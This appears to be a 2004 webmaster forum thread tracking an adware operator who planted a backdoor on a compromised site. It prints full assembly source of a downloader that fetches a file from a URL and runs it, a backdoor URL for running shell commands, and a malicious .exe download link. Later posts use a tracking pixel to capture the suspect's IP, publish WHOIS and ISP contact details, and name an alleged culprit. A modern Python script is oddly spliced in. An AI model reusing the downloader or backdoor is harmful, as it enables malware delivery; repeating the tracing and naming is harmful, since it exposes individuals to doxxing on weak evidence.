I clicked your site yesterday and got viruses, spyware and shit on my computer! Spent all last night deleting that shit! Thanks a lot....
It's managed; the security is all their fault. They have no idea what is going on. They are clueless.
Learning more about this hacker....
xpire.info = a rooted server of someone else's.... I found a backdoor he installed:

Http://xpire.info/s/2
http://xpire.info/s/2?=$REQUEST_URI;?

Take a peek. That allows him to run shell commands. Trying to locate him, I found his thing hidden atop this site:

http://www.allo-webmaster.com/heberg...xpire.info/s/2

Look at the small print on the top... Might wanna see if he owns that site, or if the owner of the site can explain why that link is on the top? Perhaps he is compromised as well? Perhaps this IS him?

Code:
The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars.
%% BookMyName Whois version 1.0
%% DOMAIN
Domain Name : allo-webmaster.com (AWC18-BMN-DOM)
Registrar : BookMyName
Whois Server : whois.bookmyname.com
Referral URL : https://www.bookmyname.com
Registrant / Admin Contact : PERSON Zak SADIQ (SADIQ2-BMN-PE)
    hay salam 70
    11000 Sale
    FRANCE
    phone : 02147483647
    fax :
    e-mail : [email protected]
Billing Contact : PERSON Zak SADIQ (SADIQ2-BMN-PE)
    hay salam 70
    11000 Sale
    FRANCE
    phone : 02147483647
    fax :
    e-mail : [email protected]
Technical Contact : PERSON Zak SADIQ (SADIQ2-BMN-PE)
    hay salam 70
    11000 Sale
    FRANCE
    phone : 02147483647
    fax :
    e-mail : [email protected]
Domain servers :
    ns1.publi6.net (NPN23-BMN-HST)
    ns2.publi6.net (NPN24-BMN-HST)
Created on 03/10/2004 18:21:45
Updated on 04/02/2004 14:49:02
Expires on 03/10/2005 13:21:45

Interesting HTML (the forum filter mangled the `<meta` tags in the original; restored here):

Code:
<title>Http://xpire.info/s/2 : recherche sur Http://xpire.info/s/2</title>
<meta name="description" content="Http://xpire.info/s/2 ">
<meta name="keywords" content="Http://xpire.info/s/2">
<meta name="revisit-after" content="15 days">
<meta name="robots" content="index,follow">
<meta NAME="Language" CONTENT="fr">
<meta name="rating" content="General">
<meta name="resource-type" content="document">
<meta name="distribution" content="Global">
<meta name="copyright" content="Copyright (C), 2004, Allo webmaster , Http://xpire.info/s/2 ">
<meta name="author" CONTENT="Zaki">
<meta NAME="Language" CONTENT="fr">
<meta NAME="Identifier-URL" CONTENT="http://www.allo-webmaster.com">
<meta NAME="Reply-to" CONTENT="[email protected]">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="http://www.allo-webmaster.com/style.css" rel="stylesheet" type="text/css">
Here is another domain he owns/owned:
Code:
Domain Name: B00GLE.COM
Registrant:
    n/a
    Janet Jacjson ([email protected])
    Hali-gali, 77
    Deli
    null,12345
    IN
    Tel. +91.226370256
Creation Date: 31-Mar-2004
Expiration Date: 31-Mar-2005
Domain servers in listed order:
    ns1.smartdns.org
    ns2.smartdns.org
    ns1.smartnic.org
    ns2.smartnic.org
Administrative Contact:
    n/a
    Janet Jacjson ([email protected])
    Hali-gali, 77
    Deli
    null,12345
    IN
    Tel. +91.226370256
Technical Contact:
    n/a
    Janet Jacjson ([email protected])
    Hali-gali, 77
    Deli
    null,12345
    IN
    Tel. +91.226370256
Billing Contact:
    n/a
    Janet Jacjson ([email protected])
    Hali-gali, 77
    Deli
    null,12345
    IN
    Tel. +91.226370256
Status: SUSPENDED
Note: This Domain Name is Suspended. In this status the domain name is InActive and will not function.
Seems that that server (the xpire.info one) is running a proxy server:
Code:
Interesting ports on 202.99.23.162:
(The 1653 ports scanned but not shown below are in state: filtered)
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
80/tcp   open   http
8080/tcp closed http-proxy
This is the root site on the server:
http://202.99.23.162/

Not sure what language it is, but that is who the main owner of the server seems to be.
He seems to center around xpire.com and b00gle.com:
http://qkacdesign.uw.hu/chcounter/st...rs_days_stats= |
Seems he is busy at work; that link does not work anymore, however this one began to:

http://www.xpire.info/fa/tool.html

This is what the source of that page looks like:

Code:
<html>
Surely this guy is doing some bad shit:
Notice the telnet calls?

Code:
var downloadurl="http://213.159.117.133/dl/loadadv65.exe";
Master of misdirection this guy is:
Good thing the internet has a memory :)

http://216.239.59.104/search?q=cache...b00gle.com/fa/ %3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache...b00gle.com/fa/ tool.html+&hl=en

http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the same files, as if copied in a for loop. I especially liked 2 files in the dir; counter.htm containing the extremely funny

Code:
<script language="JavaScript">
<!--
// Sends visitors whose browser locale is Russian off to home.html.
// The forum filter mangled the script tags and the comparison operator
// in the original post; "==" is assumed here.
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>

But then I saw this: http://www.pizdato.biz/acc10/2DimensionOfExploits.asm

Hehehe, Open Source is getting big! I didn't see a GPL licence, so I hope I'm not violating someone's copyright by posting this here....

Code:
; Downloader stub: reads a URL from its own command line, fetches it with
; urlmon!URLDownloadToFileA into c:\y.exe, then runs that file.
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data
    szLibrary  db "urlmon.dll",0
    szFunction db "URLDownloadToFileA",0
    szFileName db "c:\y.exe", 0

.code
start:
    invoke GetCommandLineA                  ; eax -> full command line
    add ax, 0Ah                             ; skip 10 characters (the program name) to reach the URL; note: adjusts only the low 16 bits, as written
    lea ecx, [eax]
    push ecx                                ; save pointer to the URL
    invoke LoadLibrary, addr szLibrary      ; load urlmon.dll
    invoke GetProcAddress, eax, addr szFunction ; eax = URLDownloadToFileA
    pop ecx
    push 0                                  ; lpfnCB
    push 0                                  ; dwReserved
    lea ebx, [szFileName]
    push ebx                                ; szFileName = "c:\y.exe"
    push ecx                                ; szURL
    push 0                                  ; pCaller
    call eax                                ; URLDownloadToFileA(NULL, url, "c:\y.exe", 0, NULL)
    invoke WinExec, addr szFileName, 1      ; execute the downloaded file
    invoke ExitProcess, NULL
end start

Yet I do feel a bit suspicious about this set of files... a bit TOO educating, I think ;)
Wow!
http://www.webhelper4u.com/thewatcherlist.html

Jackpot. It could be ANY of those people. IS YOUR NAME ON THAT LIST? Lots of adult sites listed.
Ok, I know the issue now:
Your PHP is insecure. Update and secure your PHP on your web server. Update Apache as well. Make sure you are current. Here is a list of the AdWare people and their IPs:

http://www.webhelper4u.com/CWS/cwsbyalphanumeric.html

Notice that if you copy the first three parts of an IP and search elsewhere in the list, you will find many domains on the same class C? Voila. Happy hanging.
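The class C pivot described in the post above, as an added example (not code from the thread or from webhelper4u): take a "domain ip" list, bucket every entry by its /24, and report only the networks that host more than one domain. The list format and the entries are constructed here using RFC 5737 documentation addresses; the webhelper4u list itself is not reproduced.

```python
"""Cluster a domain -> IP list by /24 to spot operators sharing a network.

Added example, not code from the thread. The "domain ip" line format and
the entries in CONSTRUCTED_LIST are made up (RFC 5737 addresses).
"""
import ipaddress
from collections import defaultdict

CONSTRUCTED_LIST = """\
# domain              ip
ads-one.example       203.0.113.14
ads-two.example       203.0.113.77
ads-three.example     203.0.113.200
lonely.example        192.0.2.5
mirror-a.example      198.51.100.9
mirror-b.example      198.51.100.10
broken-entry.example  not.an.ip
"""


def parse_pairs(text):
    """Parse "domain ip" lines; skips comments, blanks and malformed addresses."""
    pairs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            pairs.append((fields[0], ipaddress.ip_address(fields[1])))
        except ValueError:
            continue  # a bad address should not abort the whole list
    return pairs


def cluster_by_prefix(pairs, prefixlen=24, min_size=2):
    """Group domains by the /prefixlen network containing their IP.

    Returns {network: [sorted domains]} only for networks that host at
    least min_size domains, so a single-tenant address is not reported
    as a cluster.
    """
    groups = defaultdict(list)
    for domain, ip in pairs:
        net = ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False)
        groups[str(net)].append(domain)
    return {net: sorted(doms) for net, doms in groups.items() if len(doms) >= min_size}


if __name__ == "__main__":
    for net, doms in sorted(cluster_by_prefix(parse_pairs(CONSTRUCTED_LIST)).items()):
        print(net, ", ".join(doms))
```

Shared /24 space is a weak signal on its own (a hosting provider's customers share it too); it is most useful when combined with the registrant and name-server overlaps the earlier posts found.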
Don't forget your pipe, Sherlock
Bumping this. I hit one of the BangBros Tugjobs hosted galleries and was hit with an ActiveX for Trytoimprovesecurity.com also. It attempts to hijack the browser and install something; blocked it with Norton.

IP associated is 213.159.117.133
Amazing how many adult sites are engaging in bad adware:

http://www.webhelper4u.com/CWS/cwsbyalphanumeric.html

I just got an ICQ from a stranger telling me that if I push any further they will come kill me. They are hackers paid by the adult industry to hack sites and put that on them, fucked up shit. Fuck them, I will keep pushing and find out who they are and expose them for hacking into sites illegally. Put aside the adware part, they are still breaking and entering. I'm coming to get ya!
who's your hosting company?
Quote:
Out of 100, I'd say 95 would be hackable. And that's just with a basic security audit; if I did a full-blown one on all of them, I'd say at least 99 of them would be insecure in one way or another. I've been doing security work for the better part of 20 years and have yet to see a fully secure system. If someone wants in, they will get in. Plain and simple. I've also yet to see a system that I haven't been able to penetrate during a full-blown pen test. Most security people are that way, and if they are not, they need to learn more.
I am happy though that a lot of webmasters/site owners are taking security into consideration now. They used to laugh back in the day when we told them it was a hacker..... it had the same effect as if we told them a yellow zebra was standing behind them. I have been in security since 1992 and just love the thrill of securing a box and hunting down hackers. :-) I smell their blood. lol
Quote:
But there is a way to make a server very, very secure, even against unknown exploits. I can surely make a server that 99.9% of hackers can't hack.
Quote:
Yeah, disable every service known and pray that your kernel is secure and your router and firewall are updated. I've gotten around many "secure" servers because they didn't keep their routers and firewalls updated.
Quote:
And don't forget to compile your whole distro by hand and strip all the binaries. Also, if you want more security, put all the services in a chroot (the best option is one service per server)... and don't just copy the whole system into the chroot, only the needed libraries... Apache does not need a bash shell in order to run in its sandbox. Of course, this will do nothing if you open every possible service around and set your root password to something easy to guess. So configure your firewall properly, blocking all inbound SYN packets except for the ports where you will offer some service, and all outbound packets (any traffic) except for the ports your services will use. You will get some headaches configuring FTP services under these firewall rules... but it's not a very big problem. This concept has been tested for over 5 years with IronBox Linux on a server open for hacking with shell access (they were able to start a shell session on the box), and no one has been able to escalate privileges. It's not only the firewall, it's the entire system. Usually firewalls are the most useless part in security because they can always be bypassed using one method or another. It's not easy and takes some time to bypass a firewall, but it's still possible and not difficult enough to stop a not-very-novice hacker.
I have caught your hacker!
Here is the lowdown.....

To find the hacker you must first find out who owns those domains..... And the only way to see who owns those domains (because the info is fake) is to find out WHO is receiving the emails for the domain's contact email account, which for all those domains is the same person. This person uses a Yahoo email address, and getting the info on who owns an email account from Yahoo would be very difficult, especially considering they most likely filled in fake info there as well. So why not get their IP from Yahoo, you ask? Because Yahoo won't help you without a subpoena..... Even friends I have at Yahoo can't help me because they do not allow access to logs except to their legal dept., which is a pain to deal with as well.....

So, I ask myself: if this person is using a Yahoo web-based email account to check his mail, and we need his IP address to identify him, let's get the IP already! I decided to email an artificial spam mail to him. The secret here is that he is the ONLY one getting this spam mail. I used a rather catchy subject that he COULD NOT RESIST: "Hacker Caught?"

When he looked at the email, it was nothing special. I made it look like an ad for an online casino. He would take a peek at it, then most likely just delete it thinking to himself, "fucking spammer!", while his heart pumped heavily thinking perhaps he had been caught. What he DID NOT KNOW happened behind the scenes is that in the spam mail, the only image that was loaded in the email was an invisible 1x1 pixel. All other items in the mail were HTML. This 1x1 hidden pixel was loaded off of MY server using an image name that NO ONE would know. In fact, the image doesn't even exist, and since I set the height and width of the image to 1, he would not see a broken image in there anyways.....

This would simply generate a couple of log entries on my server letting me know HIS HOME COMPUTER'S IP ADDRESS, because in order to use Yahoo mail you have to use a web browser, and he certainly did!!! Because the image does not exist on my server but his browser tried to load it, his accessing his Yahoo mail led to 2 entries in my server logs. One is the access_log entry, and the other, when the image could not be found, was the error_log entry.

The URL to the non-existent image is: http://www.splitinfinity.com/themainman

Code:
access_log entry:
195.131.125.119 www.splitinfinity.com - [19/Aug/2004:01:01:46 -0700] "GET /themainman HTTP/1.1" 302 302 "http://us.f403.mail.yahoo.com/ym/ShowLetter?MsgId=1922_1014156_59656_1208_1013_0_846_4944_1839376362&Idx=0&YY=48958&inc=25&order=down&sort=date&pos=0&view=&head=&box=Inbox" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2"

error_log entry:
[Thu Aug 19 01:01:46 2004] [error] [client 195.131.125.119] File does not exist: /home/split/splitinfinity.com/public_html/themainman, referer: http://us.f403.mail.yahoo.com/ym/Sho...ead=&box=Inbox

******** His IP address is: 195.131.125.119 **********

This is most likely a dynamic IP, but since we know the time and date of the access, we can call the IP owner (his ISP, as listed below) and perhaps get that information. I will continue to send him some of these emails and log all the IP ranges he comes from, which I'm sure at this point will all be the same ISP since it is a broadband connection on his end.

w00000h00000! Betcha he didn't see that coming.
Code:
OrgName:    RIPE Network Coordination Centre
OrgID:      RIPE
Address:    Singel 258
Address:    1016 AB
City:       Amsterdam
StateProv:
PostalCode:
Country:    NL

ReferralServer: whois://whois.ripe.net:43

NetRange:   195.0.0.0 - 195.255.255.255
CIDR:       195.0.0.0/8
NetName:    RIPE-CBLK3
NetHandle:  NET-195-0-0-0-1
Parent:
NetType:    Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS2.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH03.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment:    These addresses have been further assigned to users in
Comment:    the RIPE NCC region. Contact information can be found in
Comment:    the RIPE database at http://www.ripe.net/whois
RegDate:    1996-03-25
Updated:    2004-03-16

TechHandle: RIPE-NCC-ARIN
TechName:   RIPE NCC Hostmaster
TechPhone:  +31 20 535 4444
TechEmail:  [email protected]

# ARIN WHOIS database, last updated 2004-08-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Further, more accurate whois data from RIPE:

The company that OWNS the IP itself is: WEBPlus Ltd., St. Petersburg, RU

Their email addresses:
[email protected]
[email protected]
[email protected]
[email protected]

Code:
Michael V. Vasiliev
ZAO WebPlus, 29 Kolomenskaya
191119, Saint-Petersburg
Russia
phone:  +7 812 3269020
fax-no: +7 812 3269029
Great job, boss
Quote:
That's totally assholish of you. Like it's his fault someone hacked his shit. It's as retarded as blaming Ford because someone slammed a semi into the car, but buddy died because he didn't have his seatbelt on. Point is, secure or not, these people find ways in.
This thread was surely interesting...
well done SplitInfinity. Was very interesting to follow your progress even if most of the links are already dead
very impressive splitinfinity, now we need a team of webmasters to pay this guy a visit
Quote:
The BW prices on your site, are they actual usage (as in 320 GB in+out combined is 1 Mbps) or 95th percentile based? 95% I guess?
Well done!
I see that someone else on here has the skills. Tracking down hackers isn't as hard as people think it is. I did it many, many times when I was the IT manager and head of security for a live feed company, and I have also done it for clients of mine. I may have a use for you sometime, as sometimes I get too busy for all my clients, and taking on more work is not always the best thing as I want my clients to be 150% happy with what I do, so I limit what I'll take so I don't stretch myself too thin.
splitinfinity is the fucking MAN!!!
You really know your shit SplitInfinity, very impressive!

I'd trust you with my box.
The bandwidth pricing on SplitInfinity.com is average utilization based on MRTG graphs. Bring your sites over. :-)
Thanks for the compliments. Anyone else need any help? I really love doing this stuff.... By the way, The guy's name is Miroslav Petrovic who hacked your site. :-) Go get em! |
So how are things going? Have you owned his ass yet?
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.